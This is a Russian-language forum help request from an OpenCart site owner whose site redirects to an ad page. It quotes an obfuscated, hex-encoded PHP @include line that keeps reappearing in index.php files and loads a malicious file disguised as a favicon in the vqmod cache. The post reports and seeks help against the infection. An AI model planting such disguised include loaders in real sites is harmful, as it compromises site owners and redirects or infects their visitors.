Как удалить вредоносный код из сайта

Здравствуйте. Недавно начал замечать, что при открытии моего сайта идет редирект на какой то рекламный сайт. Начал смотреть свой код, в index.php нашел строку такого вида:

/*1d3ec*/
@include "\x2fhom\x65/ab\x6din/\x64oma\x69ns/\x68***\x61**\x65/pu\x62lic\x5fhtm\x6c/vq\x6dod/\x76qca\x63he/\x66avi\x63on_\x3786a\x34f.i\x63o";
/*1d3ec*/

когда убрал лишнее, получился путь к какому то файлу:

home/admin/domains/домен_сайта/public_html/vqmod/vqcache/favicon_786a4f.ico

Нашел этот файл, открываю его, а там:

Ну ладно думаю, код удалил из index.php, файл тоже.. на следующий день появился новый код в этом же стиле и новый файл, только в другой папке. Как очистить сайт от этой заразы?

Движок: Опенкарт 2.1.0.1

Из модулей установлены только: Marketplace, Ajax Product Page Loader, [OCJazz] SeoPro, uLogin - панель. Модификаторы: Local copy OCMOD by iSenseLabs, Easy Blog Simple for oc2011+.

Пароль к хостингу изменил, атрибуты для файла index.php сделал "только чтение", не помогло. Возможно кто то сталкивался с таким. Спасибо что дочитали до конца!

UPD: Заметил, что каждые сутки (примерно) этот вредоносный код добавляется на все страницы index.php. В корне сайта, в папке admin, в папке vqmod и т.д.